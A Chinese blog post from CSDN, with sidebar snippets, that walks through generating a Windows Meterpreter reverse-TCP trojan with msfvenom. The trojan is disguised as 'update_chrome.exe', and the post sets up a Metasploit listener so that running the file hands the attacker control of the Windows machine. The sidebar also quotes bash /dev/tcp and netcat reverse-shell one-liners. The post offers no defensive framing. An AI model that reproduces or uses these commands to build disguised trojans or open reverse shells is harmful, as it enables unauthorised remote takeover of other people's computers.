kali 反弹shell 远程操作Windows

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量2.7k 收藏 4
点赞数
分类专栏: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42409788/article/details/90719870
版权

一、在kali终端执行下面命令,生成木马。
       反向链接有多种协议:
       payload:/windows/meterpreter/reverse_http

        payload:/windows/meterpreter/reverse_https
        msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.72  LPORT=6666 -f exe > update_chrome.exe #名称随意

      lhost: 本地监听IP

     lport: 本地监听端口

     -f  生成文件类型   exe 为Windows ,elf 为shell 

二、打开msf控制台,监听本地端口。

    use exploit /multi/handler

    set  lhost 192.168.1.72

    set  lport 6666

   set payload windows/meterpreter/reverse_tcp

    exploit

   Windows 电脑上运行update_chrome.exe 程序后控制台自动登录Windows系统。

天码行空的码
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmd反弹shell提权
10-24
cmd反弹shell提权
kali下使用远程桌面连接
p_utao的博客
10-28 5702
apt-get install rdesktop rdesktop IP:端口
【安全知识】——LInux的shell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 729
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
kali linux2.0入侵安卓,kali2.0下入侵windows 10和android手机实战
weixin_39758041的博客
05-13 896
msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exeroot@kali:~# service postgresql startroot@...
网络安全 - Kali Linux反向端口连接&免杀
weixin_34307464的博客
06-09 876
本篇文章适用学习,维护网络安全,做合法公民 介绍:之前使用 小七免杀工具包 来作免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。 如今开源的东西比起手工来做,不仅免杀率高,速度快,功能多,而且会长期维护。下面我就介绍下 Hercules 工具:...
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4374
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
使用windows远程连接kali的桌面
m0_51395584的博客
11-25 5845
使用windows远程连接kali的桌面
kali20.1更新源的相关操作
01-20
kali20.1更新源的相关操作 1.先进入更新源的文件(如果是root权限,则不用在前面加上sudo): sudo vim /etc/apt/sources.list 在password后面输入自己的密码即可: 2.在文件后面加上以下更新源,可根据自己需要进行...
详解NC反弹shell的几种方法
01-08
最终是将ubuntu、CentOS的shell反弹kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell...
Kali系列之root账户ssh远程登录配置.docx
12-06
添加后,别忘了重启SSH服务`service ssh restart`,这样新版本的Kali Linux就支持了老版本的密钥交换算法,应该可以顺利地通过CRT等客户端工具进行远程登录了。 总的来说,配置Kali Linux的root账户SSH远程登录涉及...
Kali Linux Windows Penetration Testing azw3
09-27
Kali Linux Windows Penetration Testing 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
kali壁纸,拿来当当windows壁纸也挺不错的
01-24
标题提到的"Kali壁纸",实际上指的是Kali Linux操作系统的官方壁纸,这些壁纸以其独特的设计风格和与安全相关的主题吸引着用户,即便是非Kali Linux使用者也会因为它们的美观性而将其用作Windows操作系统的桌面背景...
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9408
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
kali linux 运行exe,简单的kali linux控制win7系统
weixin_42129970的博客
04-30 4920
本帖最后由 青衫覆雪 于 2019-10-23 08:36 编辑一、准备工作:1、安装kali linux2、从win7上拷贝一个可执行的.exe文件至kali linux(文中使用的是windows自带的calc.exe文件)二、开始在kali linux上创建.exe文件命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8...
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1325
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件到msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8989
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
反弹shell方法
Sea_Sand息禅
04-06 781
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
TomcatCVE-2020-10487任意命令执行(msf反弹shell
qq_43665434的博客
05-14 981
TomcatCVE-2020-10487任意命令执行(msf反弹shell) 漏洞原理:传送门 Ghostcat本身是一个Local File Include/Read(本地文件包含/读)漏洞,而非任意文件上传/写漏洞。在Apache Tomcat的安全公告页中,Ghostcat被描述为“AJP Request Injection and potential Remote Code Execution”(AJP请求注入和潜在的远程代码执行)漏洞。Potential表明Ghostcat默认情况下并非RCE
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2130
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
kali远程控制windows命令
04-21
Kali Linux是一种流行的渗透测试和网络安全评估操作系统,它提供了许多工具和功能来进行远程控制和攻击测试。在Kali Linux中,你可以使用不同的方法来远程控制Windows命令行。 一种常见的方法是使用反向Shell。反向...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值